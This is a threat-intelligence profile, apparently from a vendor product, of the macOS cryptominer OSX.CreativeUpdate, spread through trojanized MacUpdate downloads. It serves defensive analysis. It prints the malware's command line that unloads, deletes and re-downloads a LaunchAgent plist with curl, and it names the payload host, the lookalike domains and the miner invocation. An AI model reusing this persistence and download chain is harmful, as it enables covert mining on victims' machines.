OSX.CreativeUpdate is a macOS cryptocurrency-mining malware family identified by SentinelOne researcher Arnaud Abbati. It was distributed through trojanized applications hosted on the compromised MacUpdate website, including maliciously modified copies of Firefox, OnyX, and Deeper delivered as .dmg files. The malware was designed to run in the background and use the victim Mac’s CPU to mine Monero.
The trojanized apps were built with Platypus and presented themselves as legitimate installers, instructing users to drag the application into the Applications folder. When executed, they downloaded an additional payload from public.adobecc.com, saved mdworker.zip into the user’s hidden ~/Library directory, and attempted to launch bundled decoy copies of the expected applications to reduce suspicion. Reported campaign infrastructure included lookalike domains such as titaniumsoftware.org for Titanium Software products and download-installer.cdn-mozilla.net for the fake Firefox distribution.
For persistence, the malware installed a LaunchAgent named MacOSupdate.plist in ~/Library/LaunchAgents. This LaunchAgent repeatedly executed and also downloaded or replaced another plist, MacOS.plist, from public.adobecc.com. The resulting execution chain launched ~/Library/mdworker/sysmdworker with the argument "-user walker18@protonmail.ch -xmr". The sysmdworker process used minergate-cli to mine Monero and periodically connected to minergate.com using the login walker18@protonmail.ch.
Operational mistakes were observed in the campaign: the malicious Deeper app reportedly included an OnyX decoy instead of Deeper, and on systems running macOS 10.7 through 10.12 the malware could execute while the bundled OnyX decoy failed to open. Malwarebytes stated that it detects this threat as OSX.CreativeUpdater.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
11 distinct techniques documented for this family, organized by ATT&CK tactic.
The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick to make you think it’s coming from a legitimate site.)
Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm -rf ~/Library/LaunchAgents/MacOS.plist && curl -o ~/Library/LaunchAgents/MacOS.plist ...
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Cryptominer distributed via trojanized Mac applications, installs and runs a Monero miner using the minergate-cli tool.
A macOS cryptocurrency-mining malware distributed via maliciously modified app downloads from MacUpdate. It installs persistence through LaunchAgents, downloads additional plist configuration, runs sysmdworker, and uses minergate-cli to mine Monero in the background.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.